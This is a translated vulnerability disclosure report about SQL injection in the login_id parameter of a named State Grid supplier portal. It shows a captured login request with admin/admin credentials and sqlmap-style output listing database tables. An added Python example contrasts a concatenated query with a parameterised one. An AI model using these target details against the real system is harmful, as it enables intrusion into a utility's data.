2013-09-03: Details reported to the vendor, awaiting vendor handling
2013-09-04: Vendor confirmed; details disclosed to the vendor only
2013-09-14: Details disclosed to core white hats and experts in the relevant field
2013-09-24: Details disclosed to regular white hats
2013-10-04: Details disclosed to intern white hats
2013-10-18: Details disclosed to the public
This system is a disaster.
System address:
https://bosp.sgid.sgcc.com.cn/
Although it is protected by SSL, I still captured the SSL login request.
POST https://bosp.sgid.sgcc.com.cn/LoginAction.do HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://bosp.sgid.sgcc.com.cn/LoginAction.do
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: bosp.sgid.sgcc.com.cn
Content-Length: 33
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=MY7vSk1WHs8QVtbNv0LQTbzrsXrKNzGvzd9FJQBsJYqxmWv31SCm!326014796

cn=&login_id=admin&password=admin
The username parameter (login_id) is not filtered, which leads to SQL injection. There is a lot of data in there.
web application technology: Servlet 2.4, JSP 2.0
back-end DBMS: Oracle
available databases [1]:
[*] BOSP
604 tables. I won't read them all out; a knowing smile will do.
[00:18:25] [INFO] retrieved: 604
[00:18:33] [INFO] retrieved: BOSP_GLOBAL_SUPPLIER_0129
[00:20:19] [INFO] retrieved: BOSP_GYS_SIGNATURE
[00:21:16] [INFO] retrieved: BOSP_WF_USERSMSLINK
[00:22:22] [INFO] retrieved: BOSP_GLOBAL_ATTACHMENT_BAK
[00:23:54] [INFO] retrieved: BOSP_ZB_ACCDOCERRDETAIL
[00:25:15] [INFO] retrieved: BOSP_ZB_ACCITEM
[00:25:42] [INFO] retrieved: BOSP_ZB_ACCMODELENTRY
[00:26:33] [INFO] retrieved: BOSP_ZB_APPROVEOPTION
[00:27:32] [INFO] retrieved: BOSP_ZB_BORROWAPPLY
[00:28:26] [INFO] retrieved: BOSP_ZB_BORROWYUSUAN
[00:29:03] [INFO] retrieved: BOSP_ZB_BXDETAIL
[00:29:42] [INFO] retrieved: BOSP_ZB_BXSTANDARD
[00:30:25] [INFO] retrieved: BOSP_ZB_CHANGEBIDSERV
A portion of the data is enough as proof.
See the detailed description.
0x1: Can you afford to hurt a poor guy digging for holes late at night? Every place where injection could happen must be strictly guarded.
0x2: Give this a decent rank!!!
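To show the kind of flaw the report describes (login_id concatenated into the login query) next to the fix the author asks for, here is an added example that is not part of the original report or of the BOSP system. It uses an in-memory SQLite table as a stand-in for the real Oracle back end; the table and column names are assumptions.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the login table (names are assumptions)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login_id TEXT, password TEXT)")
    # Two constructed accounts; the second has a quote in its name on purpose.
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "admin"), ("o'brien", "s3cret")])
    conn.commit()
    return conn


def login_vulnerable(conn, login_id, password):
    """Mirrors the flaw in the report: login_id and password are pasted into
    the SQL text, so any quote in the input changes the query structure."""
    sql = ("SELECT COUNT(*) FROM users WHERE login_id = '%s' AND password = '%s'"
           % (login_id, password))
    return conn.execute(sql).fetchone()[0] == 1


def login_hardened(conn, login_id, password):
    """Parameterised query: the driver binds both values as data, so the SQL
    structure is fixed no matter what the user types. (Passwords are compared
    in the clear here only to mirror the report; store a salted hash.)"""
    sql = "SELECT COUNT(*) FROM users WHERE login_id = ? AND password = ?"
    return conn.execute(sql, (login_id, password)).fetchone()[0] == 1


def probe(conn, login_fn, login_id, password):
    """Classify a login attempt as 'ok', 'denied' or 'sql-error' so the two
    implementations can be compared on the same input."""
    try:
        return "ok" if login_fn(conn, login_id, password) else "denied"
    except sqlite3.Error:
        # A database error on ordinary input is the tell-tale sign that user
        # data is being interpreted as SQL; treat it as a defect, not noise.
        return "sql-error"


if __name__ == "__main__":
    db = make_db()
    for fn in (login_vulnerable, login_hardened):
        print(fn.__name__, probe(db, fn, "o'brien", "s3cret"))
```

A legitimate username containing a quote already breaks the concatenated version while the parameterised version handles it, which is the check a reviewer can run against any login handler without crafting an attack string.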
Severity: High
Vulnerability Rank: 15
Confirmed: 2013-09-04 08:44
Thank you
None yet